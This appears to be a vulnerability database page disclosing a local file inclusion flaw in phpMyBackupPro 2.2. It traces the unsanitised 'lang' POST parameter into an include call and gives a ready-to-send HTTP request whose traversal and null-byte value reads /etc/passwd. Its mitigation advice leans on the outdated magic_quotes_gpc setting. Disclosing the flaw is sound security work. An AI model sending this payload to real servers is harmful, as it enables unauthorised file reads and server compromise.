phpMyBackupPro Local File Inclusion Vulnerability

vendor:

phpMyBackupPro

by:

dun

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: phpMyBackupPro

Affected Version From: phpMyBackupPro <= 2.2

Affected Version To: phpMyBackupPro <= 2.2

Patch Exists: YES

Related CWE:

CPE: a:phpmybackuppro:phpmybackuppro:2.2

Metasploit:

Other Scripts:

Platforms Tested:

2012

phpMyBackupPro Local File Inclusion Vulnerability

The phpMyBackupPro application is vulnerable to Local File Inclusion. The vulnerability exists in the definitions.php file, where user-supplied input is not properly validated before being used in a file include function. An attacker can exploit this vulnerability to include arbitrary files from the server, leading to remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input before using it in file include functions. Additionally, enabling magic_quotes_gpc can provide some protection against this vulnerability.

Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM
	
   [ Discovered by dun \ posdub[at]gmail.com ]
   [ 2012-07-03                              ]
 ##################################################################
 # [ phpMyBackupPro <= 2.2 ]  Local File Inclusion Vulnerability  #
 ##################################################################
 #
 # Script: "phpMyBackupPro is a very easy to use, free, web-based
 #          MySQL backup application, licensed under the GNU GPL."
 #
 # Vendor:   http://www.phpmybackuppro.net/
 # Download: http://sourceforge.net/projects/phpmybackup/files/phpMyBackupPro/
 #
 #
 # File: ./phpMyBackupPro-2.2/config.php (line: 26)
 #  ..cut..
 #  26    require_once("login.php");                                                 // 1
 #  ..cut..
 #
 # File: ./phpMyBackupPro-2.2/login.php (line: 29)
 #  ..cut..
 #  29    require_once("definitions.php");                                           // 2
 #  ..cut..
 #
 # File: ./phpMyBackupPro-2.2/definitions.php (lines: 201-206)
 #  ..cut..
 #  201    // check if language was just changed in config.php
 #  202    if (isset($_POST['lang']) && preg_replace("#.*/#","",$_SERVER['PHP_SELF'])=="config.php") $CONF['lang']=$_POST['lang']; // 3
 #  203
 #  204    // include language.inc.php
 #  205    if (!isset($CONF['lang'])) $CONF['lang']="english";
 #  206    if (!file_exists($prepath.PMBP_LANGUAGE_DIR.$CONF['lang'].".inc.php"))    // 4
 #           include_once($prepath.PMBP_LANGUAGE_DIR."english.inc.php");             // 4
 #           else include($prepath.PMBP_LANGUAGE_DIR.$CONF['lang'].".inc.php");      // 4 [LFI]
 #  ..cut..
 #
 #
 # [LFI] ( magic_quotes_gpc = Off; )
 # Vuln:
 #
 #  POST /phpMyBackupPro-2.2/config.php HTTP/1.1
 #  Host: localhost
 #  User-Agent: Mozilla/5.0
 #  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 #  Accept-Language: pl,en-us;q=0.7,en;q=0.3
 #  Accept-Encoding: gzip, deflate
 #  Connection: keep-alive
 #  Content-Type: application/x-www-form-urlencoded
 #  Content-Length: 39
 #  lang=../../../../../../../etc/passwd%00
 #
 ### [ dun / 2012 ] #####################################################